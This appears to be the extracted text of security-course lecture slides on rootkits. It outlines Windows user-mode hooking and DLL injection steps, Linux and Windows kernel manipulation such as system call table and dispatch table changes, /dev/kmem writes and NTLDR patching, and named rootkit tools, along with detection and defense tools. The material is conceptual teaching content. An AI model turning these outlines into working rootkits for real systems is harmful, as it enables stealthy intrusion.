When the OS loads the application, it parses the
IMAGE_IMPORT_DESCRIPTOR structure and loads each
required DLL into the application’s memory.
Once the DLL is mapped, the OS locates each imported
function in memory and overwrites an array with that
address.
Windows User Mode Rootkits
API HOOKING Method 1:
Import Address Table Hooking
Rootkit needs to be installed in application’s
memory.
Reset one of these pointers to the rootkit code.
Windows User Mode Rootkits
API HOOKING Method 2:
Inline Hooking
Replace code of functions in a DLL.
Replace first 5 bytes of function with a jump to your rootkit
code.
Save the overwritten bytes in a “trampoline”
Rootkit executes the trampoline and then calls the target
function
Target function eventually returns to rootkit.
Rootkit edits return values.
Rootkit passes the return values on to the calling function.
Windows User Mode Rootkits
DLL Injection
forces an exe process to accept a DLL it
never requested.
This is a method to get a rootkit into a
target application.
As always, assumes that the attacker has
complete access to the system.
Windows User Mode Rootkits
DLL Injection
forces an exe process to accept a DLL it never
requested.
Allocate space in victim process for the DLL code to
occupy. (VirtualAllocEx)
Allocate space in victim process for the DLL parameters.
(VirtualAllocEx)
Write name and code into the memory space of the
victim process. (WriteProcessMemory)
Create a thread in the victim process
(CreateRemoteThread)
Free up resources in the victim process after execution is
complete.
Windows User Mode Rootkits
DLL Injection
forces an exe process to accept a DLL it
never requested.
Use of registry:
Windows NT/2000/XP/2003 has a registry key
HKEY_LOCAL_MACHINE\Software\Microsoft\Window
sNT\CurrentVersion\Windows\AppInit_DLLs
Rootkit can set the value of this key to a DLL of its
own that modifies target process’ IAT.
Windows User Mode Rootkits
DLL Injection allows to hijack any process
Attacker must have Debug Programs right on
system.
Attacker uses DLL injection by
modifying a running dll that displays information
on the screen.
Modified dll still calls original dll.
But does not display all the data.
Windows User Mode Rootkits
AFX Windows RootKit
Attacker uses afx windows rootkit configuration
console to generate code on his machine.
Then executes it on the victim’s machine.
AFX WinRK
installs itself in the System32 directory.
Creates iexplore.dll and explorer.dll
injects explorer.dll and iexplore.dll into
explorer.exe
That process displays the GUI to users.
hides network connections, files, ...
User Level Rootkit Defenses
Preventing Root Kits
Harden systems and apply patches.
Detect Root Kits
File Integrity Checking (Signatures)
Root Kit Identification
Look for specific changes made in most root
kits
chkrootkit for Unix
Kernel Mode Rootkits
Kernel Functions
Process and Thread
Interprocess Communication
Memory
File System
Hardware
Interrupts
Kernel Mode Rootkits
Kernel
Relies on hardware
level protection
Ring 0 vs. Ring 3 for
Intel CPU
Prevents user
processes from
accessing critical
kernel data
structures.
Kernel Mode Rootkit
Processes running in kernel mode
belong to the kernel.
Administrator, root only invoke user
mode processes.
These processes access the kernel.
Change in kernel changes
behavior of all processes.
Kernel Mode Rootkit
Kernel Mode Rootkit Capabilities
File & Directory Hiding
Process Hiding
Network Port Hiding
Promiscuous Mode Hiding
Execution Redirection
Device Interception and Control
Kernel Mode Rootkit
Advantages over User Level Rootkit:
Changes all programs that try to discover
something from the kernel.
Statically linked binary forensic tools no
longer work
Linux Kernel
Linux allows us to look at many internal
kernel structures:
/proc
Slash proc
Virtual directory, lives only in memory.
Lots of commands just grab info from /proc.
We can write to certain areas of /proc such as
/proc/net
Linux Kernel
/proc
/cpuinfo
/devices
/ksmg
Log messages from kernel
/ksyms
List of all variables and functions that are
exported via loadable kernel modules on the
machine
Linux Kernel
/proc
/net
/stat
/sys
Statistics such as data about CPU, virtual
memory, hard drive usage
Kernel variables.
/version
Linux Kernel
/dev
Contains pointers to various devices.
/dev/kmem
Image of the running kernel’s memory
/dev/mem
Image of all the memory
Gibberish without special tools
Linux Kernel
User mode processes use System Calls to
access kernel.
Embedded in the systems libraries:
SYS_open
SYS_read
SYS_write
SYS_execve
SYS_setuid
SYS_get_kernel_syms
SYS_query_module
Linux Kernel
Located in
/usr/include/sys/syscall.h
/usr/include/bits/syscall.h
/usr/include/asm/unistd.h
Or similar locations.
Linux Kernel
System Call Table:
Array maintained by the kernel that maps
individual system call names and numbers.
Located also in memory.
On harddrive:
“less /boot/System.map”
Use strace to find the system calls made by a
command:
“strace ls”
Linux Kernel
Linux Kernel Manipulations
Loadable Kernel Modules
Legitimate Linux / Solaris kernel feature
Add support for new hardware
Can replace existing kernel features without
system reboot.
Linux Kernel Manipulations
Attacker uses
insmod to
Alter System Call
Table.
Load Kernel
module.
Linux Kernel Manipulations
Evil kernel module alters SYS_execve Looks at calling
process.
If process is for a program that attacker wants to redirect
Attacker can wrap the true SYS_execve code.
Evil kernel module actually calls another program.
Makes it easy to generate the altered version of SYS_execve.
This alteration defeats file integrity checking tools.
SYS_execve code is still there, only
Never called.
Called if not interfering with attacker (if wrapped).
True login function, true sshd, true … not called, but
replacements are.
Linux Kernel Manipulations
Loadable kernel modules do not survive
a system reboot.
Attacker alters programs in the boot
process.
init
Once inserted, loadable kernel module
hides changes to the altered boot process
Linux Kernel Manipulations
Mighty Adore
Loadable kernel module
Adore interface: Ava.
Kernel Intrusion System (KIS)
Comes with slick GUI
Linux Kernel Manipulations
Alternative to Loadable Kernel Module
Use /dev/kmem
Attackers can use tools that read and write
to kernel memory image.
Attacker can insert alternative code for
system calls.
Attacker can change the System Call Table.
Linux Kernel Manipulations
Patching Kernel Image File
Simplest way:
Attacker “patches” vmlinuz file.
Contains the kernel image.
Linux Kernel Manipulations
User Mode Linux (UML)
UML at user-mode-linux.sourceforge.net
Runs entire Linux kernel inside a normal
user-mode process.
Like VMWare, creates virtual environment.
Sysads, users are running in this virtual
environment.
Linux Kernel Manipulations
Kernel Mode Linux Project
Allows certain user processes to run in
kernel mode.
Attacker patches kernel with KML.
Attacker now has processes that run in
kernel mode.
Writes code to alter system call table and
system call code.
Defending the Linux Kernel
Prevention
Deny superuser access to attackers.
Patch quickly.
Change kernel so that it no longer allows
loadable kernel modules.
Redhat 8.0, Redhat 9.0, Linux 2.5.41
Install Systrace to track and limit systems
calls.
Use Linux Security Module in your kernel.
Defending the Linux Kernel
Kernel Mode RootKit Detection
Look for suspicious network activity
File Integrity Checkers (to catch the not quite
good enough hacker).
Use systrace to follow system calls made by an
application.
www.city.umich.edu/u/provos/systrace (free tool).
chkrootkit
Looks for system anomalies.
Each directory has a link count. Link count should be
equal to the number of files + 2.
Defending the Linux Kernel
Kernel Mode RootKit Detection
Kernel Security Therapy Anti-Trolls (Linux
2.4)
Looks for changes to the system call table.
Scans /dev/kmem
Looks for memory locations of system calls and
compares with System.map
Creates fingerprints of system calls and various
critical programs.
Defending the Linux Kernel
Kernel Mode RootKit Detection
Syscall Sentry
Rootkit Hunter
Loadable kernel module.
Checks for modules that alter the system table.
Alerts system administrator in this case.
www.rootkits.nl
Similar to Chkrootkit
Rootkit Revealer (windows) by Russinovich
Blacklight (windows) F-secure
Defending the Linux Kernel
Investigating potentially rootkitted
systems:
Boot from a trusted CD
Helix, Knoppix, …
Boot a small linux OS
Contain Windows forensics tools.
Windows Kernel
User process calls DLL
DLL can
return to user process.
Go to csrss.exe (client
server runtime)
Require kernel function
Windows Kernel
User process makes call to ReadFile
Win32 Subsytem DLL makes call to NtReadFile in
Ntdll.dll
Ntdll.dll makes a call to the Executive.
Ntdll.dll translates well-documented API into rather obscure
ones (that can be easily changed.)
Executive sits inside ntoskrnl.exe
Determines which piece of kernel code is needed to handle
request.
Kernel code interacts with hardware (disk).
Uses Hardware Abstraction Layer (HAL.dll).
Windows Kernel
Ntdll.dll call into kernel:
System service dispatching.
Essentially a system call.
Uses the System Service Dispatch Table.
Table indicates where the appropriate system
service code is located within the kernel.
Windows Kernel
Fewer tools allow us to look at kernel
structures.
Windows Kernel: Tools
Ctrl + Alt + Del
Task Manager Process Table
Windows Kernel: Tools
System Idle Process PID 0
System Process with PID 8
Just accounts for idle CPU time, not a real
process.
Contains data on all running threads in kernel
mode.
Smss.exe (Session Manager)
First user mode process running on the machine.
Activated by kernel during system boot.
Analogous to the Unix Init Daemon.
Windows Kernel: Tools
Csrss.exe
Winlogon.exe
Process that manages the Win32 system.
Initiated by Smss.exe.
Let’s users log on to the system.
Smss.exe, CSrss.exe, Winlogon.exe are
the first processes after boot to run in
user mode.
Windows Kernel: Tools
Start Control Panel Administrative Tools Performance
Click “+” and check process
Kernel (red line)
is using up time.
Windows Kernel: Tools
Process Explorer
http://www.sysinternals.com/ntw2k/freeware/
procexp.shtml
Shows every running process.
Displays process hierarchy.
Windows Kernel: Tools
DependencyWalker
(www.dependencywalker.com)
Traces relationship between user processes
and the user-mode DLLs.
Allows us to see when the kernel is invoked.
Manipulating Windows Kernel
Same basic strategies as in Linux:
Evil Device Driver.
Corresponds to Loadable Kernel Module
Alter running kernel in memory.
Overwrite kernel image on file.
Deploy kernel on a virtual system.
Run user-mode code at kernel level.
Manipulating Windows Kernel
Evil Device Driver
Alters system service call handling by loading a
device driver.
Replaces or alters kernel functions.
Needs administrator privileges.
Needs to get evil code to run:
Overwrite existing kernel functionality
Alter system service dispatch table to point to new code.
Alter System Service Dispatcher.
Manipulating Windows Kernel
Manipulating Windows Kernel
If a Windows administrator installs a
device driver, Windows will check for a
valid digital signature.
Attacker with root privileges just
accepts the warning.
Manipulating Windows Kernel
Various alternatives to get evil device
driver to run:
Evil driver can overwrite kernel.
Driver replaces existing code.
Evil driver implements various kernel
functions and then changes the system
dispatch table.
“Interrupt hooking” changes how the
kernel handles CPU interrupts.
Manipulating Windows Kernel
Altering a Running Kernel in Memory
Instead of a device driver, directly change
the kernel code in memory.
Manipulating Windows Kernel
Altering a Running Kernel in Memory:
Windows uses the Global Descriptor Table
(GDT) to manage memory.
GDT stores division into various segments.
Store segment accessibility by ring 0/3.
Unfortunately, attacker can add a memory
segment to the GDT.
Greg Hoglund Phrak 55
Explains how to bypass Security Monitor.
Add memory segment from location 0x00000000 to
0xffffffff.
This gives memory access to all user processes!
Manipulating Windows Kernel
Manipulating Windows Kernel
Altering a Running Kernel in Memory:
Alternatively, manipulate
\Device\PhysicalMemory object.
Alternatively, use PhysMem from
sysinternals.com.
Attacker can now change system
functionality.
Manipulating Windows Kernel
Patching the Kernel on the Hard Drive
Not as easy as it sounds.
System boot checks integrity of Ntoskrnl.exe.
Thus, not possible to only change the kernel file.
Have to change both the integrity checker and the
kernel.
Integrity checker sits in NTLDR.
Attack: Change one instruction to jump over the
integrity check.
Currently, not heavily used.
Manipulating Windows Kernel
Patching the Kernel on the Hard Drive
Patch first NTLDR to disable integrity
check.
Then patch Ntoskrnl.exe to disable security
access check.
Now introduce rootkit.
Manipulating Windows Kernel
Create a fake system using a virtual
machine.
Variety of Virtual Machines
VMWare
Plex86
Virtual PC
Bochs
But need to hide start-up message.
Unlike Linux, that is difficult.
Protecting the Windows Kernel
Prevent access to the machine.
Detect a rootkit:
Antivirus tools recognize most rootkit files
before installation.
Some rootkits can be spotted afterwards.
Because developers were careless.
File Integrity Checkers
Protecting the Windows Kernel
Removing Rootkits
Analyze system without invoking the
kernel.
Use a FIRE or Knoppix bootable CD-ROM
and look at the hard drive.
Registry / File System.
Next Generation Malware
BIOS
Malware active before booting from a
device.
Bioscentral website for tools to look at
BIOS.
Microkernel